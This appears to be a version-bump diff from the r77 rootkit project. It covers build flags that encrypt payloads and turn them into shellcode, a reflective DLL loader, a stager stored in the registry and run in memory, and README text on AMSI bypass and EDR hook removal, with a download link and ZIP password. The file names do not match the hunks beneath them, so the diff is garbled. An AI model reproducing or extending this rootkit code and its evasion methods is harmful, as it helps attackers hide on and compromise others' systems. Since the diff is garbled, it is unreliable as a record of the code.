1.6.0

Author: bytecode77

$Docs/Documentation.docx

@@ -15,7 +15,6 @@ namespace BuildTask
 	/// <para>-compress: Compress file</para>
 	/// <para>-encrypt: Encrypt file</para>
 	/// <para>-toshellcode: Extracts an executable file's .text section</para>
-	/// <para>-r77service: Write R77_SERVICE_SIGNATURE to r77 header</para>
 	/// <para>-r77helper: Write R77_HELPER_SIGNATURE to r77 header</para>
 	/// <para>-shellcodeinstaller: Converts Install.exe to Install.shellcode</para>
 	/// </summary>
@@ -39,7 +38,6 @@ public static int Main(string[] args)
 				if (args.Contains("-compress")) file = Compress(file);
 				if (args.Contains("-encrypt")) file = Encrypt(file);
 				if (args.Contains("-toshellcode")) file = ExtractShellCode(file);
-				if (args.Contains("-r77service")) file = R77Signature(file, R77Const.R77ServiceSignature);
 				if (args.Contains("-r77helper")) file = R77Signature(file, R77Const.R77HelperSignature);
 
 				File.WriteAllBytes(args[0], file);

Stager/RunPE.cs renamed to $Docs/RunPE.removed.cs

@@ -1,5 +1,5 @@
 using System.Reflection;
 
-[assembly: AssemblyVersion("1.5.5")]
-[assembly: AssemblyFileVersion("1.5.5")]
+[assembly: AssemblyVersion("1.6.0")]
+[assembly: AssemblyFileVersion("1.6.0")]
 [assembly: AssemblyCopyright("© bytecode77, 2025.")]

BuildTask/BuildTask.cs

@@ -96,16 +96,7 @@ BOOL GetProcessList(PPROCESS_LIST_ENTRY entries, LPDWORD count)
 }
 BOOL CreateConfigSystem()
 {
-	HKEY key;
-	if (InstallR77Config(&key))
-	{
-		RegCloseKey(key);
-		return TRUE;
-	}
-	else
-	{
-		return FALSE;
-	}
+	return InstallR77Config();
 }
 BOOL Inject(DWORD processId, LPBYTE dll, DWORD dllSize)
 {

Global/GlobalAssemblyInfo.cs

@@ -21,7 +21,7 @@ int main()
 		RegSetValueExW(key, HIDE_PREFIX L"stager", 0, REG_BINARY, stager, stagerSize) != ERROR_SUCCESS) return 0;
 
 	// This powershell command loads the stager from the registry and executes it in memory using Assembly.Load().EntryPoint.Invoke()
-	// The C# binary will proceed with creating a native process using process hollowing.
+	// The C# binary will proceed with starting the r77 service using reflective DLL injection.
 	// The powershell command is purely inline and doesn't require a ps1 file.
 
 	LPWSTR powershellCommand = GetPowershellCommand();

Helper/Helper.c

@@ -68,7 +68,7 @@ This graph shows each stage from the execution of the installer all the way down
 Several AV and EDR evasion techniques are in use:
 
 - **AMSI bypass:** The PowerShell inline script disables AMSI by patching `amsi.dll!AmsiScanBuffer` to always return `AMSI_RESULT_CLEAN`. Polymorphism is used to evade signature detection of the AMSI bypass.
-- **DLL unhooking:** Since EDR solutions monitor API calls by hooking `ntdll.dll`, these hooks need to be removed by loading a fresh copy of `ntdll.dll` from disk and restoring the original section. Otherwise, process hollowing would be detected.
+- **DLL unhooking:** Since EDR solutions monitor API calls by hooking `ntdll.dll`, these hooks need to be removed by loading a fresh copy of `ntdll.dll` from disk and restoring the original section. Otherwise, process injection would be detected.
 
 ## Test environment
 
@@ -82,7 +82,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki
 
 ## Downloads
 
-[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.5.5.zip](https://downloads.bytecode77.com/r77Rootkit%201.5.5.zip)
+[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.6.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.6.0.zip)
 (**ZIP Password:** bytecode77)<br />
 [![](https://bytecode77.com/public/fileicons/pdf.png) Technical Documentation](https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf)
 

Install/Install.c

@@ -14,7 +14,6 @@ BOOL WINAPI ReflectiveDllMain(LPBYTE dllBase)
 	NT_VIRTUALALLOC virtualAlloc = (NT_VIRTUALALLOC)PebGetProcAddress(0x6a4abc5b, 0x91afca54);
 	NT_VIRTUALPROTECT virtualProtect = (NT_VIRTUALPROTECT)PebGetProcAddress(0x6a4abc5b, 0x7946c61b);
 
-	// Safety check: Continue only, if all functions were found.
 	if (ntFlushInstructionCache && loadLibraryA && getProcAddress && virtualAlloc && virtualProtect)
 	{
 		PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(dllBase + ((PIMAGE_DOS_HEADER)dllBase)->e_lfanew);

README.md

@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup Label="Globals">
+    <MSBuildAllProjects Condition="'$(MSBuildVersion)' == '' Or '$(MSBuildVersion)' &lt; '16.0'">$(MSBuildAllProjects);$(MSBuildThisFileFullPath)</MSBuildAllProjects>
+    <HasSharedItems>true</HasSharedItems>
+    <ItemsProjectGuid>{beabb20f-6030-4275-a8cf-56245417f4b1}</ItemsProjectGuid>
+  </PropertyGroup>
+  <ItemDefinitionGroup>
+    <ClCompile>
+      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories);$(MSBuildThisFileDirectory)</AdditionalIncludeDirectories>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ProjectCapability Include="SourceItemsFromImports" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="$(MSBuildThisFileDirectory)ReflectiveDllMain.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="$(MSBuildThisFileDirectory)ReflectiveDllMain.c" />
+  </ItemGroup>
+</Project>